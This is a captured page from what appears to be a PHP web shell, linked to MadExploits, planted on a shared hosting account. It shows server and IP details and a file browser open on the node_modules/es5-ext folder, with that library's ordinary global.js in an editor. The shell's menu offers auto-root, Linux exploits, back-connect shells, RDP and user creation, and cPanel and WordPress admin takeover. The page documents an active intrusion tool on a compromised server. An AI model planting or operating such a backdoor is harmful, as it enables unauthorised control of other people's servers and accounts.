Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.17
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
es5-ext /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
array
[ DIR ]
dr-xr-xr-x
boolean
[ DIR ]
dr-xr-xr-x
date
[ DIR ]
dr-xr-xr-x
error
[ DIR ]
dr-xr-xr-x
function
[ DIR ]
dr-xr-xr-x
iterable
[ DIR ]
dr-xr-xr-x
json
[ DIR ]
dr-xr-xr-x
math
[ DIR ]
dr-xr-xr-x
number
[ DIR ]
dr-xr-xr-x
object
[ DIR ]
dr-xr-xr-x
promise
[ DIR ]
dr-xr-xr-x
reg-exp
[ DIR ]
dr-xr-xr-x
string
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.editorconfig
288
B
-rw-r--r--
CHANGELOG.md
10.49
KB
-rw-r--r--
CHANGES
27.35
KB
-rw-r--r--
LICENSE
773
B
-rw-r--r--
README.md
39.64
KB
-rw-r--r--
global.js
1.11
KB
-rw-r--r--
index.js
624
B
-rw-r--r--
optional-chaining.js
431
B
-rw-r--r--
package.json
1.82
KB
-rw-r--r--
safe-to-string.js
266
B
-rw-r--r--
to-short-string-representation...
413
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : global.js
var naiveFallback = function () { if (typeof self === "object" && self) return self; if (typeof window === "object" && window) return window; throw new Error("Unable to resolve global `this`"); }; module.exports = (function () { if (this) return this; // Unexpected strict mode (may happen if e.g. bundled into ESM module) // Fallback to standard globalThis if available if (typeof globalThis === "object" && globalThis) return globalThis; // Thanks @mathiasbynens -> https://mathiasbynens.be/notes/globalthis // In all ES5+ engines global object inherits from Object.prototype // (if you approached one that doesn't please report) try { Object.defineProperty(Object.prototype, "__global__", { get: function () { return this; }, configurable: true }); } catch (error) { // Unfortunate case of updates to Object.prototype being restricted // via preventExtensions, seal or freeze return naiveFallback(); } try { // Safari case (window.__global__ works, but __global__ does not) if (!__global__) return naiveFallback(); return __global__; } finally { delete Object.prototype.__global__; } })();
Close